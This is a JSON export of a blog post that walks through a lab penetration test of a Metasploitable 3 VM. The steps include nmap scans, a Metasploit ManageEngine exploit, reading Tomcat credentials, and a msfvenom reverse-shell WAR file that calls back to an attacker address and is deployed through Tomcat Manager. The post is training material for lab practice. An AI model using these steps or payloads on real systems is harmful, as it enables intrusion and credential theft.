{"id":568,"date":"2024-06-15T04:47:17","date_gmt":"2024-06-15T04:47:17","guid":{"rendered":"https:\/\/hackmybox.com\/?p=568"},"modified":"2024-08-15T07:05:56","modified_gmt":"2024-08-15T07:05:56","slug":"building-your-own-pentest-box-part-3-ethical-hacking-exploitation-with-metasploit","status":"publish","type":"post","link":"https:\/\/hackmybox.com\/index.php\/2024\/06\/15\/building-your-own-pentest-box-part-3-ethical-hacking-exploitation-with-metasploit\/","title":{"rendered":"Building Your Own Pentest Box: Part 3 \u2013 Ethical Hacking (Exploitation with Metasploit)"},"content":{"rendered":"\n<p><strong>Important Disclaimer: Using these modules for anything other than testing on a system you have permission to exploit is illegal and unethical.<\/strong><\/p>\n\n\n\n<p>1. The <code class=\"\">nmap -sP<\/code> command in Nmap performs a <strong>ping sweep<\/strong>, a technique used to identify active hosts on a network (in current Nmap versions <code class=\"\">-sn<\/code> is the equivalent option).<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"568\" height=\"192\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-39.png\" alt=\"\" class=\"wp-image-626\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-39.png 568w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-39-300x101.png 300w\" sizes=\"auto, (max-width: 568px) 100vw, 568px\" \/><\/figure>\n\n\n\n<p>2. 
The <code class=\"\">nmap -sV<\/code> command in Nmap performs a basic <strong>service version scan<\/strong>, probing each open port to identify the service and version behind it.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"731\" height=\"565\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-42.png\" alt=\"\" class=\"wp-image-629\" style=\"width:670px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-42.png 731w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-42-300x232.png 300w\" sizes=\"auto, (max-width: 731px) 100vw, 731px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"672\" height=\"304\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-41.png\" alt=\"\" class=\"wp-image-628\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-41.png 672w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-41-300x136.png 300w\" sizes=\"auto, (max-width: 672px) 100vw, 672px\" \/><\/figure>\n\n\n\n<p>This provides more information about the target, Metasploitable 3 (10.0.2.5), than a simple ping sweep (<code class=\"\">nmap -sP<\/code>). It reveals:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Open ports on the target devices.<\/li>\n\n\n\n<li>The application or service likely running on those ports.<\/li>\n<\/ul>\n\n\n\n<p>3. Metasploit includes modules for both exploiting and gathering information about ManageEngine Desktop Central. These modules would allow you to potentially take control of or compromise a vulnerable system. 
&#8220;<strong>search manageengine desktop<\/strong>&#8221; returns a list of modules related to ManageEngine Desktop Central.<\/p>\n\n\n\n<p>&#8220;<strong>use 1<\/strong>&#8221; selects the exploit module to use by its index in the search results, here <code class=\"\">exploit\/windows\/http\/manageengine_connectionid_write<\/code>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"782\" height=\"558\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44.png\" alt=\"\" class=\"wp-image-631\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44.png 782w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44-300x214.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-44-768x548.png 768w\" sizes=\"auto, (max-width: 782px) 100vw, 782px\" \/><\/figure>\n\n\n\n<p>4. In Metasploit, the concept of &#8220;options&#8221; refers to the configurable settings that can be adjusted for a particular exploit module, auxiliary module, payload, or encoder. These options allow you to fine-tune the module&#8217;s behavior to suit your specific needs during a penetration testing engagement.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"774\" height=\"507\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45.png\" alt=\"\" class=\"wp-image-632\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45.png 774w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45-300x197.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-45-768x503.png 768w\" sizes=\"auto, (max-width: 774px) 100vw, 774px\" \/><\/figure>\n\n\n\n<p>5. <code class=\"\">set &lt;option_name&gt; &lt;value&gt;<\/code>: This command sets the value of a specific option. For example, <code class=\"\">set RHOST 10.0.2.5<\/code> sets the target IP address (RHOST) to 10.0.2.5. 
Enter &#8220;execute&#8221; to run the module.<\/p>\n\n\n\n<p>You&#8217;ve successfully established a connection with a target system using a Meterpreter payload in Metasploit.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"775\" height=\"327\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46.png\" alt=\"\" class=\"wp-image-633\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46.png 775w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46-300x127.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-46-768x324.png 768w\" sizes=\"auto, (max-width: 775px) 100vw, 775px\" \/><\/figure>\n\n\n\n<p>6. This command instructs the Meterpreter session to execute a program or command on the target system. &#8220;<strong><code>-f cmd.exe<\/code> -i<\/strong>&#8221; specifies the program to execute, which is <code class=\"\">cmd.exe<\/code> (the Windows command prompt); <code class=\"\">-i<\/code> interacts with the new process so you get a usable command prompt.<\/p>\n\n\n\n<p>&#8220;NT AUTHORITY\\LocalService&#8221; indicates that the command was executed under the LocalService account on the target system.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"636\" height=\"262\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-47.png\" alt=\"\" class=\"wp-image-634\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-47.png 636w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-47-300x124.png 300w\" sizes=\"auto, (max-width: 636px) 100vw, 636px\" \/><\/figure>\n\n\n\n<p>7. 
Navigate to the directory as seen below.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"755\" height=\"362\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-11.png\" alt=\"\" class=\"wp-image-580\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-11.png 755w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-11-300x144.png 300w\" sizes=\"auto, (max-width: 755px) 100vw, 755px\" \/><\/figure>\n\n\n\n<p>8. Enter the <code class=\"\">type<\/code> command to view the content of <code class=\"\">tomcat-users.xml<\/code>. By default Tomcat keeps the manager credentials in this file in clear text, so restricting read access to it is an important hardening step.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"791\" height=\"305\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12.png\" alt=\"\" class=\"wp-image-581\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12.png 791w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12-300x116.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-12-768x296.png 768w\" sizes=\"auto, (max-width: 791px) 100vw, 791px\" \/><\/figure>\n\n\n\n<p>9. In the output you can see the username below.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"671\" height=\"551\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-48.png\" alt=\"\" class=\"wp-image-635\" style=\"width:624px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-48.png 671w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-48-300x246.png 300w\" sizes=\"auto, (max-width: 671px) 100vw, 671px\" \/><\/figure>\n\n\n\n<p>10. 
You can also run <code class=\"\">netstat<\/code> to view details about active connections.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"623\" height=\"555\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-14.png\" alt=\"\" class=\"wp-image-583\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-14.png 623w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-14-300x267.png 300w\" sizes=\"auto, (max-width: 623px) 100vw, 623px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"644\" height=\"529\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-15.png\" alt=\"\" class=\"wp-image-584\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-15.png 644w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-15-300x246.png 300w\" sizes=\"auto, (max-width: 644px) 100vw, 644px\" \/><\/figure>\n\n\n\n<p>11. 
Back in Metasploit, create the WAR file using the command below:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"676\" height=\"161\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-30.png\" alt=\"\" class=\"wp-image-614\" style=\"width:646px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-30.png 676w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-30-300x71.png 300w\" sizes=\"auto, (max-width: 676px) 100vw, 676px\" \/><\/figure>\n\n\n\n<p><strong>How the Command Works:<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong><code>msfvenom<\/code>:<\/strong> This is the payload generator that ships with Metasploit; it produces payloads in many formats.<\/li>\n\n\n\n<li><strong><code>-p java\/jsp_shell_reverse_tcp<\/code>:<\/strong> This specifies the payload type, a Java JSP shell configured for a reverse TCP connection.<\/li>\n\n\n\n<li><strong><code>LHOST=10.0.2.4<\/code>:<\/strong> This sets the local host IP address (your attacking machine) to which the payload will attempt to connect back.<\/li>\n\n\n\n<li><strong><code>LPORT=4445<\/code>:<\/strong> This defines the local port on your attacking machine where you&#8217;ll listen for the incoming connection from the compromised system.<\/li>\n\n\n\n<li><strong><code>-f war<\/code>:<\/strong> This specifies the output format as a WAR file, a web application archive commonly used by Java web servers like Tomcat.<\/li>\n\n\n\n<li><strong><code>> malicious.war<\/code>:<\/strong> This redirects the generated WAR file to a file named <code class=\"\">malicious.war<\/code>.<\/li>\n<\/ul>\n\n\n\n<p>12. Open a web browser and navigate to the target machine&#8217;s address on port <strong>8282<\/strong>, where Tomcat is likely running. We identified this port during the Nmap scan in step 2. 
Click on &#8220;Manager App&#8221;.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"777\" height=\"529\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16.png\" alt=\"\" class=\"wp-image-585\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16.png 777w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16-300x204.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-16-768x523.png 768w\" sizes=\"auto, (max-width: 777px) 100vw, 777px\" \/><\/figure>\n\n\n\n<p>13. Enter the username and password obtained in step 9.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"786\" height=\"554\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21.png\" alt=\"\" class=\"wp-image-590\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21.png 786w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21-300x211.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-21-768x541.png 768w\" sizes=\"auto, (max-width: 786px) 100vw, 786px\" \/><\/figure>\n\n\n\n<p>13. Now upload the WAR file created in step 11. 
Then the malicious file will be uploaded and deployed to acquire a remote shell.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"780\" height=\"513\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23.png\" alt=\"\" class=\"wp-image-592\" style=\"width:840px;height:auto\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23.png 780w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23-300x197.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-23-768x505.png 768w\" sizes=\"auto, (max-width: 780px) 100vw, 780px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"784\" height=\"557\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24.png\" alt=\"\" class=\"wp-image-593\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24.png 784w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24-300x213.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-24-768x546.png 768w\" sizes=\"auto, (max-width: 784px) 100vw, 784px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"784\" height=\"545\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25.png\" alt=\"\" class=\"wp-image-594\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25.png 784w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25-300x209.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25-768x534.png 768w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-25-590x410.png 590w\" sizes=\"auto, (max-width: 784px) 100vw, 784px\" \/><\/figure>\n\n\n\n<p>14. 
The <code class=\"\">exploit\/multi\/handler<\/code> module in Metasploit is a generic payload handler: it listens on the LHOST and LPORT chosen in step 11 and receives the reverse connection from the deployed JSP shell.<\/p>\n\n\n\n<p>Open a browser on the attacker machine (Kali) and enter http:\/\/10.0.2.5:8282\/malicious in the address bar. The shell banner will appear once the connection succeeds.<\/p>\n\n\n\n<p>For more details about reverse shells see the link below:<\/p>\n\n\n\n<p><a href=\"https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/how-to-use-a-reverse-shell-in-metasploit.html\">https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/how-to-use-a-reverse-shell-in-metasploit.html<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"783\" height=\"553\" src=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49.png\" alt=\"\" class=\"wp-image-636\" srcset=\"https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49.png 783w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49-300x212.png 300w, https:\/\/hackmybox.com\/wp-content\/uploads\/2024\/06\/image-49-768x542.png 768w\" sizes=\"auto, (max-width: 783px) 100vw, 783px\" \/><\/figure>\n\n\n\n<p>15. Reference:<\/p>\n\n\n\n<p><a href=\"https:\/\/era.library.ualberta.ca\/items\/ada5c209-9f7c-4406-bddb-656821859523\">https:\/\/era.library.ualberta.ca\/items\/ada5c209-9f7c-4406-bddb-656821859523<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.offsec.com\/metasploit-unleashed\/\">https:\/\/www.offsec.com\/metasploit-unleashed\/<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/docs.metasploit.com\/\">https:\/\/docs.metasploit.com\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Important Disclaimer: Using these modules for anything other than testing on a system you have permission to exploit is illegal and unethical. 1. The nmap -sP command in Nmap is used for performing a ping sweep. Ping sweep is a technique used to identify active hosts on a network. 2. 
The nmap -sV command in Nmap [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":787,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","site-transparent-header":"default","prose-style":"enable","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[12],"tags":[],"class_list":["post-568","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-labs"],"_links":{"self":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts\/568","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/comments?post=568"}],"version-history":[{"count":15,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts\/568\/revisions"}],"predecessor-version":[{"id":655,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/posts\/568\/revisions\/655"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/media\/787"}],"wp:attachment":[{"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/media?parent=568"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackmybox.com\/index.php\/wp-json\/wp\/v2\/categories?post=568"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackmybox.com
\/index.php\/wp-json\/wp\/v2\/tags?post=568"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}